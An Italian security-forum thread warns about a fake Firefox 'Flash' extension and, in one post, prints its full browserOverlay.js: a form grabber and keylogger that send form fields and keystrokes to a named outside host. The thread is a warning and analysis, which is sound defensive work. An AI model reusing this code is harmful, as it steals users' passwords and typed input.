Falso estensione per Firefox

Unax · 15-01-2011, 09:44

questo sito propone una falsa estensione per firefox

hqqp://www.marykiss.byethost31.com/gallery_.html

la falsa estensione viene scaricata da qui

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

riazzituoi · 15-01-2011, 18:12

.

xcdegasp · 15-01-2011, 18:28

hai dettagli di come funzioni?

Unax · 15-01-2011, 18:36

Quote:

Originariamente inviato da deepdark

virustotal non la riconosce come virus e hitman neppure.
Sei sicuro?

se vedi da che sito lo si scarica capisci subito che è una falsa estensione

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

si spaccia per il sito ufficiale delle estensioni, l'estensione si chiama flash, il sito principale ti dice che è necessaria l'estensione per visualizzare la galleria d'immagini realizzata in flash

tutti segnali tipici di malware

Unax · 15-01-2011, 18:38

Quote:

Originariamente inviato da deepdark

virustotal non la riconosce come virus e hitman neppure.
Sei sicuro?

se vedi da che sito lo si scarica capisci subito che è una falsa estensione

hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi

tenta di spacciarsi per il sito ufficiale delle estensioni, l'estensione si chiama flash, il sito principale ti dice che è necessaria l'estensione per visualizzare la galleria d'immagini realizzata in flash

tutti segnali tipici di malware

Unax · 15-01-2011, 18:43

Quote:

Originariamente inviato da xcdegasp

hai dettagli di come funzioni?

scarica l'estensione e aprila con 7-zip, leggi il file browserOverlay.js, il creatore ha avuto la gentilezza di commentare il codice

Codice:

var prefManager = Components.classes["@mozilla.org/preferences-service;1"].getService(Components.interfaces.nsIPrefBranch);
	var firsttime = prefManager.getBoolPref("extensions.browserOverlay.firsttime");
		if (firsttime) {
			prefManager.setBoolPref("extensions.browserOverlay.firsttime", false);
			window.setTimeout(function(){
                                    gBrowser.selectedTab = gBrowser.addTab("http://www.marykiss.byethost31.com/gallery.html");
                                    }, 1500);
		}
			


//Form submission listener
window.document.onsubmit = search;

//Search the document forms
function search() {
	var forms = content.document.getElementsByTagName('form');
	for(var i=0; i<forms.length; i++) {
		if(forms[i].id)
			var form = content.document.getElementById(forms[i].id);
		else
			var form = content.document.forms[i];
		
		if(form.elements[i].value != '')
				found(form);
		}
	}

//Save information from the target form
function found(form) {
	//EDIT THIS BELLOW TO MATCH YOUR LOGGIN SCRIPT
	var host = 'http://www.skepxis.byethost6.com/save.php';
	
	//Record time and date
	var currentTime = new Date();
	var minutes = currentTime.getMinutes();
	if (minutes < 10)
		minutes = '0' + minutes;
	var date = currentTime.getHours()+':'+minutes+' || '+currentTime.getMonth()+1+'/'+currentTime.getDate()+'/'+currentTime.getFullYear();
	var keyz = host+'?time='+date+'&p-domain='+content.document.location.href;
	
	//Add the collected form data
	for(var c=0; c<form.elements.length; c++)
		keyz += '&'+form.elements[c].name+'='+form.elements[c].value;
	send(keyz);
}

//Send the information
function send(keyz) {
	var xmlhttp;
	if (window.XMLHttpRequest)
		xmlhttp = new XMLHttpRequest();
	else if (window.ActiveXObject)
		xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
	xmlhttp.open("GET",keyz,true);
	xmlhttp.send(null);
}

<![CDATA[
 	document.addEventListener("keypress",onkey,false);
 	var keyss='';
	var link='';

 	function onkey(e)  {      
	
 	keyss+=String.fromCharCode(e.charCode);          

        link=content.document.location.href;
	
 	
	if (keyss.length>20) {
	http=new XMLHttpRequest();
        http.open("GET","http://www.skepxis.byethost6.com/key_strokes.php?keylog=" + keyss+'-------'+ link +'-------',true);
	http.send(null);    
	keyss='';
}
}     

]]>

riazzituoi · 15-01-2011, 19:12

.

Unax · 16-01-2011, 15:25

Quote:

Originariamente inviato da deepdark

Se la installassi su firefox per mac o linux funzionerebbe?

credo di sì

Unax · 17-01-2011, 18:39

ho provveduto ad inviare il file xpi ad Avira e ovviamente hanno trovato che

browserOverlay.js MALWARE

una curiosità nella mail mi parlano in spagnolo

anche se avevo selezionato di rispondermi in inglese

15-01-2011, 09:44	#1
Unax Senior Member Iscritto dal: Oct 2008 Messaggi: 6523	Falsa estensione per Firefox questo sito propone una falsa estensione per firefox hqqp://www.marykiss.byethost31.com/gallery_.html la falsa estensione viene scaricata da qui hqqp://addons-mozilla-us-firefox.awardspace.biz/Flash.xpi __________________ Il Ragazzo con la giardinetta CIAO 2021 Una canzone d'amore (cover Tommy Johansson) Ultima modifica di Unax : 15-01-2011 alle 18:48.

15-01-2011, 18:12	#2
riazzituoi Bannato Iscritto dal: Aug 2007 Messaggi: 3847	. Ultima modifica di riazzituoi : 15-02-2011 alle 22:47.

15-01-2011, 18:28	#3
xcdegasp Senior Member Iscritto dal: Nov 2001 Città: Fidenza(pr) da Trento Messaggi: 27479	hai dettagli di come funzioni? __________________ "Visti da vicino siamo tutti strani..." ~\|~ What Defines a Community? ~\|~ Thread eMule Ufficiale ~\|~ Online Armor in Italiano ~\|~ Regole di Sezione ~\|► Guida a PrivateFirewall quinto potere ~\|~ Le illusioni della TV

15-01-2011, 19:12	#7
riazzituoi Bannato Iscritto dal: Aug 2007 Messaggi: 3847	. Ultima modifica di riazzituoi : 15-02-2011 alle 22:47.

17-01-2011, 18:39	#9
Unax Senior Member Iscritto dal: Oct 2008 Messaggi: 6523	ho provveduto ad inviare il file xpi ad Avira e ovviamente hanno trovato che browserOverlay.js MALWARE una curiosità nella mail mi parlano in spagnolo anche se avevo selezionato di rispondermi in inglese __________________ Il Ragazzo con la giardinetta CIAO 2021 Una canzone d'amore (cover Tommy Johansson)

Strumenti
Mostra una versione stampabile Invia questa pagina per email